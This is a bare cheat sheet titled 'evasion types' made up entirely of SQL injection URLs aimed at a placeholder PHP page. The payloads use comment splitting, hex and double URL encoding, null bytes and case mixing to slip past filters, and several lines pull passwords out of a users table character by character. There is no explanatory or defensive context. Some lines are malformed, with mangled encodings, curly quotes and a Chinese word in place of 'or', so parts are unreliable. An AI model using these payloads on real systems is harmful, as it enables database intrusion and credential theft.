# evasion types 

www.site.com/home.php?id=-2 /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3—
www.site.com/home.php?id=-2%20Union%20Select%201,2,3--
www.site.com/home.php?id=-2 0x756e696f6e2073656c65637420312c322c332d2d 
www.site.com/home.php?id=-2%20Union%20Select%201,2,3--
www.site.com/home.php?id=-2‘ and (select substr(group_concat(pass),1,1) from users)=’a
www.site.com/home.php?id=-2‘ and substr((select max(pass) from users),1,1)=’a
www.site.com/home.php?id=-2‘ and substr((select max(replace(pass,’lastpw’,”)) from users),1,1)=’a
www.site.com/home.php?id=-2 0/**/union/*!50000select*/ 1,2,3--
www.site.com/home.php?id=-2‘||1=’1
www.site.com/home.php?id=-2‘&&1=’1
www.site.com/home.php?id=-2 or 1=convert(int,(USER))--
www.site.com/home.php?id=-2 %00%20union select 1,2,3--
www.site.com/home.php?id=-2 and 8<>200--
www.site.com/home.php?id=-2' like 90=90'--+-
www.site.com/home.php?id=-2 \0%20union select 1,2,3--
www.site.com/home.php?id=-2%27+having+1%3D1--+-
www.site.com/home.php?id=-2%%2727UniOn+sEleCt+1,2,3%00--+-
www.site.com/home.php?id=-2%%2075%%75%%6E6E%%6969%%6F6F%%6E6E%20%%7373%%6565%%6C6C%%6565%%6363%%7474%20%%3131%%2C2C%%3232%%2C2C%%3333
www.site.com/home.php?id=-2%%2075%%75%%6E6E%%6969%%6F6F%%6E6E%20%%7373%%6565%%6C6C%%6565%%6363%%7474%20%%3131%%2C2C%%3232%%2C2C%%3333%00
www.site.com/home.php?id=-2 %00(!*unIoN*)union+(!*SelEcT*)select+1,%3a,2,%3a,3,%3a--
www.site.com/home.php?id=-2“或1=1--
www.site.com/home.php?id=-2'或1=1--
www.site.com/home.php?id=null %2575%256e%2569%256f%256e%2520%2573%2565%256c%2565%2563%2574
